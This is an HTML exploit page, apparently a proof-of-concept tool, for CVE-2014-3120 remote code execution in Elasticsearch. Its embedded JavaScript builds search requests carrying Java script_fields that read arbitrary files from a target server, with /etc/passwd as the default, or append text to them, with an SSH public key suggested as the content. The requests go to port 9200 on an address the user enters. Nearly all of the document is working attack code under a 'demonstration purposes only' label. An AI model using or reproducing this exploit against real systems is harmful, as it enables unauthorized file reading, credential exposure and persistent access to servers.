<
html
><
head
><
meta
http-equiv
=
"Content-Type"
content
=
"text/html; charset=UTF-8"
>
<
link
href
=
"http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap.min.css"
rel
=
"stylesheet"
>
<
link
href
=
"http://netdna.bootstrapcdn.com/bootstrap/3.1.1/css/bootstrap-theme.min.css"
rel
=
"stylesheet"
>
<
style
>
body {
padding-top: 50px;
}
.starter-template {
padding: 40px 15px;
text-align: center;
}
</
style
>
</
head
>
<
script
src
=
"http://code.jquery.com/jquery-1.11.1.min.js"
></
script
>
<
script
>
function es_inject() {
var read_file;
var write_file;
read_file = function(filename) {
return ("import java.util.*;\nimport java.io.*;\nnew Scanner(new File(\"" + filename + "\")).useDelimiter(\"\\\\Z\").next();");
};
write_file = function(filename) {
return ("import java.util.*;\nimport java.io.*;\nPrintWriter writer = new PrintWriter(new BufferedWriter(new FileWriter(\"" + filename + "\", true)));\nwriter.println(\"" + document.getElementById("element_2").value + "\");\nwriter.close();");
};
$(function() {
var payload, filename, files, host, _i, _len;
files = [document.getElementById("element_3").value];
payload = {
"size": 1,
"query": {
"filtered": {
"query": {
"match_all": {}
}
}
},
"script_fields": {}
};
if (document.getElementById("element_4").checked) {
for (_i = 0, _len = files.length; _i <
_len
; _i++) {
filename
=
files
[_i];
payload["script_fields"][filename] = {
"script": write_file(filename)
};
}
} else {
for (
_i
=
0
,
_len
=
files
.length; _i < _len; _i++) {
filename
=
files
[_i];
payload["script_fields"][filename] = {
"script": read_file(filename)
};
}
}
$.getJSON("http://" + document.getElementById("element_1").value + ":9200/_search?
source
=
" + (encodeURIComponent(JSON.stringify(payload))) + "
&callback=?", function(data) {
var content, contents, hit, _j, _len1, _ref, _results;
console.log(data);
_ref
=
data
["hits"]["hits"];
_results = [];
for (
_j
=
0
,
_len1
=
_ref
.length; _j < _len1; _j++) {
hit
=
_ref
[_j];
_results.push((function() {
var _k, _len2, _ref1;
_ref1
=
hit
["fields"];
for (filename in _ref1) {
contents
=
_ref1
[filename];
document.getElementById("script_results").innerHTML += ("<h2>" + filename + "</
h2
>");
for (_k = 0, _len2 = contents.length; _k <
_len2
; _k++) {
content
=
contents
[_k];
document.getElementById("script_results").innerHTML += (content);
}
document.getElementById("script_results").innerHTML += ("<hr>");
//document.getElementById("script_results").innerHTML += (document.getElementById("element_4").checked);
}
})());
}
return _results;
});
});
};
//es_inject();
</
script
>
<
body
>
<
div
class
=
"navbar navbar-inverse navbar-fixed-top"
role
=
"navigation"
>
<
div
class
=
"container"
>
<
div
class
=
"navbar-header"
>
<
button
type
=
"button"
class
=
"navbar-toggle"
data-toggle
=
"collapse"
data-target
=
".navbar-collapse"
>
<
span
class
=
"sr-only"
>Toggle navigation</
span
>
<
span
class
=
"icon-bar"
></
span
>
<
span
class
=
"icon-bar"
></
span
>
<
span
class
=
"icon-bar"
></
span
>
</
button
>
<
a
class
=
"navbar-brand"
href
=
"#"
>Elastic Inject</
a
>
</
div
>
</
div
>
</
div
>
<
div
class
=
"container"
>
<
div
class
=
"starter-template"
>
<
h2
>CVE-2014-3120 Elastic Search Remote Code Execution</
h2
>
<
p
class
=
"lead"
>This will read and write files from an ES instance vulnerable to CVE-2014-3120.<
br
> This is for demonstration purposes only.</
p
>
</
div
>
<
div
class
=
"col-md-8"
>
<
label
for
=
"element_1"
>ES_IP_Address: </
label
><
br
/>
<
input
id
=
"element_1"
name
=
"element_1"
class
=
"element text medium"
type
=
"text"
maxlength
=
"255"
value
=
"127.0.0.1"
/> <
br
/>
<
label
for
=
"element_3"
>File to read/append to: </
label
><
br
/>
<
input
id
=
"element_3"
name
=
"element_3"
class
=
"element text medium"
type
=
"text"
maxlength
=
"255"
value
=
"/etc/passwd"
/> <
br
/>
<
label
class
=
"description"
for
=
"element_2"
>Content to append: </
label
><
br
/>
<
textarea
id
=
"element_2"
name
=
"element_2"
class
=
"element textarea large"
>YOUR_SSH_PUBLIC_KEY or SOMETHING</textarea> <
br
/>
<
input
id
=
"element_4"
type
=
"checkbox"
name
=
"es_action"
value
=
"write"
>WRITE<
br
/>
<
button
onclick
=
"es_inject();"
>Click me</
button
>
<
h3
>Your file contents should appear below if a read is successful. </
h3
>
<
div
id
=
"script_results"
>
</
div
>
</
div
>
<
div
class
=
"col-md-8"
>
Original vulnerability discovered by <
a
href
=
"https://twitter.com/bvdbijl"
> @BvdBijl</
a
> - <
a
href
=
"http://bouk.co/blog/elasticsearch-rce/"
>http://bouk.co/blog/elasticsearch-rce/</
a
>
</
div
>
</
div
>
<
script
src
=
"//netdna.bootstrapcdn.com/bootstrap/3.1.1/js/bootstrap.min.js"
></
script
>
</
body
></
html
>